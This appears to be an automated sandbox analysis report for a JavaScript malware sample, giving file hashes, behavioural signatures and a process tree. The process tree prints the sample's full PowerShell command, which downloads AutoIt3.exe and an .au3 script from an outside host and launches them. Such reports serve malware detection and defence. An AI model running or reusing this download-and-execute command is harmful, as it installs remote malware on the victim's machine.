Resubmissions
27-10-2023 17:41
231027-v9hqxsgb3s 1027-10-2023 17:25
231027-vzpfqahf58 1027-10-2023 17:25
231027-vy9p9shf56 10Analysis
-
max time kernel
361s -
max time network
364s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
27-10-2023 17:41
Static task
static1
Behavioral task
behavioral1
Sample
28102023_0125_trumpet.js
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
28102023_0125_trumpet.js
Resource
win10-20231020-en
Behavioral task
behavioral3
Sample
28102023_0125_trumpet.js
Resource
win10v2004-20231023-en
General
-
Target
28102023_0125_trumpet.js
-
Size
134KB
-
MD5
63fdbf0bf47d957bc9e77b9bbc7cdaf0
-
SHA1
3f3d8c96f6cf374c22dd6eac5a1c958482bbe829
-
SHA256
5d7605d640f5ede04a0e61024513f386730bfa223f39ac0d4cf2830ea6dc8500
-
SHA512
3c5e6568396ccd2fa63b993cab6c925af83b292a1d0f6e0f22c145c65e7723e698efd2613c202177c695e2038a0295855f8d9b7168815630be990430c2e51849
-
SSDEEP
1536:hZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/08:UT9U7hgaX6eerjqlI2IO6Mzqf40Ml/
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2928 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1180 wrote to memory of 2928 1180 wscript.exe 28 PID 1180 wrote to memory of 2928 1180 wscript.exe 28 PID 1180 wrote to memory of 2928 1180 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\28102023_0125_trumpet.js1⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/temp' -Type Directory -Force;cd 'C:/temp'; Invoke-WebRequest -Uri 'http://profitcentronline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://profitcentronline.com:2351/msidctseyzi' -OutFile 'dctseyzi.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'dctseyzi.au3'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-